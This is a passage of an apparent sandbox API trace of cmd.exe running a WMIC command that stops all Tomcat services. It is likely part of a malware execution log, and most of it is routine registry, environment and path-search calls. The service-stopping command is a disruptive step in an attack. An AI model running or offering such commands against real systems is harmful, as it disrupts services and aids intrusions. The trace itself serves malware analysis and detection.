| out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x1, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x0, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x40, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x40, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x40, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegCloseKey (hKey=0x94) returned 0x0 [0110.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b7ec38 | out: phkResult=0x4b7ec38*=0x94) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x40, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x1, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x1, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x0, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x9, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x4, lpData=0x4b7ec44*=0x9, lpcbData=0x4b7ec40*=0x4) returned 0x0 [0110.330] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b7ec3c, lpData=0x4b7ec44, lpcbData=0x4b7ec40*=0x1000 | out: lpType=0x4b7ec3c*=0x0, lpData=0x4b7ec44*=0x9, lpcbData=0x4b7ec40*=0x1000) returned 0x2 [0110.330] RegCloseKey (hKey=0x94) returned 0x0 [0110.330] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2981f [0110.330] srand (_Seed=0x5ad2981f) [0110.330] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE" [0110.330] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE" [0110.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0110.331] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4bc9d30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0110.331] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0110.331] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0110.331] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0110.331] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0110.331] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0110.331] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0110.331] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0110.331] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0110.331] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0110.331] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0110.331] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0110.331] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0110.331] GetEnvironmentStringsW () returned 0x4bc7dd8* [0110.331] FreeEnvironmentStringsA (penv="A") returned 1 [0110.331] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0110.331] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0110.331] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0110.331] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0110.331] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0110.331] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0110.331] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0110.332] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0110.332] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0110.332] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0110.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b7fa10 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0110.332] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4b7fa10, lpFilePart=0x4b7fa08 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b7fa08*="Desktop") returned 0x1d [0110.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0110.332] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4b7f790 | out: lpFindFileData=0x4b7f790) returned 0x4bc05c8 [0110.332] FindClose (in: hFindFile=0x4bc05c8 | out: hFindFile=0x4bc05c8) returned 1 [0110.332] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4b7f790 | out: lpFindFileData=0x4b7f790) returned 0x4bc05c8 [0110.332] FindClose (in: hFindFile=0x4bc05c8 | out: hFindFile=0x4bc05c8) returned 1 [0110.332] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0110.332] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4b7f790 | out: lpFindFileData=0x4b7f790) returned 0x4bc05c8 [0110.332] FindClose (in: hFindFile=0x4bc05c8 | out: hFindFile=0x4bc05c8) returned 1 [0110.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0110.333] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0110.333] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0110.333] GetEnvironmentStringsW () returned 0x4bc7dd8* [0110.333] FreeEnvironmentStringsA (penv="=") returned 1 [0110.333] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0110.333] GetConsoleOutputCP () returned 0x1b5 [0110.333] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0110.333] GetUserDefaultLCID () returned 0x409 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4b7fb40, cchData=128 | out: lpLCData="0") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4b7fb40, cchData=128 | out: lpLCData="0") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4b7fb40, cchData=128 | out: lpLCData="1") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0110.334] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0110.334] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0110.335] GetConsoleTitleW (in: lpConsoleTitle=0x4bcaaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0110.335] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0110.335] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0110.335] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0110.335] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0110.336] GetEnvironmentVariableW (in: lpName="tomcat", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0110.336] _wcsicmp (_String1="tomcat", _String2="CD") returned 17 [0110.336] _wcsicmp (_String1="tomcat", _String2="ERRORLEVEL") returned 15 [0110.336] _wcsicmp (_String1="tomcat", _String2="CMDEXTVERSION") returned 17 [0110.336] _wcsicmp (_String1="tomcat", _String2="CMDCMDLINE") returned 17 [0110.336] _wcsicmp (_String1="tomcat", _String2="DATE") returned 16 [0110.336] _wcsicmp (_String1="tomcat", _String2="TIME") returned 6 [0110.336] _wcsicmp (_String1="tomcat", _String2="RANDOM") returned 2 [0110.336] _wcsicmp (_String1="tomcat", _String2="HIGHESTNUMANODENUMBER") returned 12 [0110.336] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0110.336] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0110.336] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0110.336] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0110.336] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0110.336] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0110.336] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0110.338] GetConsoleTitleW (in: lpConsoleTitle=0x4b7f828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0110.338] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0110.338] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0110.338] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0110.338] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0110.338] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0110.338] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0110.338] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0110.338] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0110.338] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0110.338] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0110.338] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0110.338] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0110.338] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0110.338] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0110.338] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0110.338] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0110.338] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0110.338] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0110.338] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0110.338] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0110.338] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0110.338] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0110.338] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0110.338] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0110.339] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0110.339] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0110.339] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0110.339] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0110.339] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0110.339] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0110.339] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0110.339] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0110.339] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0110.339] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0110.339] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0110.339] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0110.339] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0110.339] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0110.339] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0110.339] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0110.339] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0110.339] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0110.339] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0110.339] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0110.339] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0110.339] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0110.339] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0110.339] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0110.339] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0110.339] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0110.339] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0110.339] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0110.339] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0110.339] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0110.339] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0110.339] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0110.339] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0110.339] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0110.339] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0110.339] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0110.339] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0110.339] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0110.339] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0110.340] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0110.340] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0110.340] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0110.340] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0110.340] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0110.340] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0110.340] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0110.340] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0110.340] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0110.340] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0110.340] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0110.340] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0110.340] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0110.340] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0110.340] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0110.340] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0110.340] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0110.340] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0110.340] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0110.340] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0110.340] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0110.340] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0110.340] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0110.340] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0110.340] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0110.340] SetErrorMode (uMode=0x0) returned 0x0 [0110.340] SetErrorMode (uMode=0x1) returned 0x0 [0110.340] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4bc05d0, lpFilePart=0x4b7f334 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b7f334*="Desktop") returned 0x1d [0110.340] SetErrorMode (uMode=0x0) returned 0x1 [0110.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0110.341] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0110.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0110.347] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.348] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0xffffffff [0110.348] GetLastError () returned 0x2 [0110.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.348] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0xffffffff [0110.348] GetLastError () returned 0x2 [0110.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0xffffffff [0110.348] GetLastError () returned 0x2 [0110.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0xffffffff [0110.348] GetLastError () returned 0x2 [0110.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0110.349] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0x4bcb228 [0110.349] FindClose (in: hFindFile=0x4bcb228 | out: hFindFile=0x4bcb228) returned 1 [0110.349] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0xffffffff [0110.349] GetLastError () returned 0x2 [0110.349] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4b7f0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b7f0c0) returned 0x4bcb228 [0110.349] FindClose (in: hFindFile=0x4bcb228 | out: hFindFile=0x4bcb228) returned 1 [0110.349] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0110.349] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0110.349] GetConsoleTitleW (in: lpConsoleTitle=0x4b7f5b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0110.349] InitializeProcThreadAttributeList (in: lpAttributeList=0x4b7f4e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4b7f4c4 | out: lpAttributeList=0x4b7f4e0, lpSize=0x4b7f4c4) returned 1 [0110.349] UpdateProcThreadAttribute (in: lpAttributeList=0x4b7f4e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4b7f4cc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4b7f4e0, lpPreviousValue=0x0) returned 1 [0110.349] GetStartupInfoW (in: lpStartupInfo=0x4b7f518 | out: lpStartupInfo=0x4b7f518*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0110.350] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0110.350] _wcsnicmp 